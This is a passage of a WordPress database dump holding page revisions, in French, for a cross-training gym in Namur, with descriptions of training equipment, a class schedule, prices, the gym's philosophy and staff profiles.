qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-04 16:32:39', '2013-07-04 16:32:39', '', 22, 'http://www.crosstrainingcenter.be/22-revision-29/', 0, 'revision', '', 0),
(331, 1, '2013-07-10 15:45:29', '2013-07-10 15:45:29', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-10 15:45:29', '2013-07-10 15:45:29', '', 11, 'http://www.crosstrainingcenter.be/11-revision-111/', 0, 'revision', '', 0),
(332, 1, '2013-07-25 16:33:42', '2013-07-25 16:33:42', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-25 16:33:42', '2013-07-25 16:33:42', '', 11, 'http://www.crosstrainingcenter.be/11-revision-112/', 0, 'revision', '', 0),
(333, 1, '2013-07-25 16:34:48', '2013-07-25 16:34:48', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-25 16:34:48', '2013-07-25 16:34:48', '', 11, 'http://www.crosstrainingcenter.be/11-revision-113/', 0, 'revision', '', 0),
(334, 1, '2013-07-25 16:30:38', '2013-07-25 16:30:38', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebell</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-07-25 16:30:38', '2013-07-25 16:30:38', '', 22, 'http://www.crosstrainingcenter.be/22-revision-31/', 0, 'revision', '', 0),
(335, 1, '2013-07-04 19:25:18', '2013-07-04 19:25:18', '<blockquote>\r\n<h2>Bien plus qu\'une simple activité physique, le cross training center de Namur vous propose une approche unique faisant intervenir l\'alimentation et la gestion du stress, tout en vous proposant un entraînement de qualité.</h2>\r\n&nbsp;</blockquote>\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"alignnone size-medium wp-image-102\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Assurer un entraînement de qualité :</h1>\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : récupérer, prévenir et améliorer. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assurée.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px; width: 320px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"alignnone size-medium wp-image-103\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 19:25:18', '2013-07-04 19:25:18', '', 5, 'http://www.crosstrainingcenter.be/5-revision-61/', 0, 'revision', '', 0),
(336, 1, '2013-07-10 15:47:02', '2013-07-10 15:47:02', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 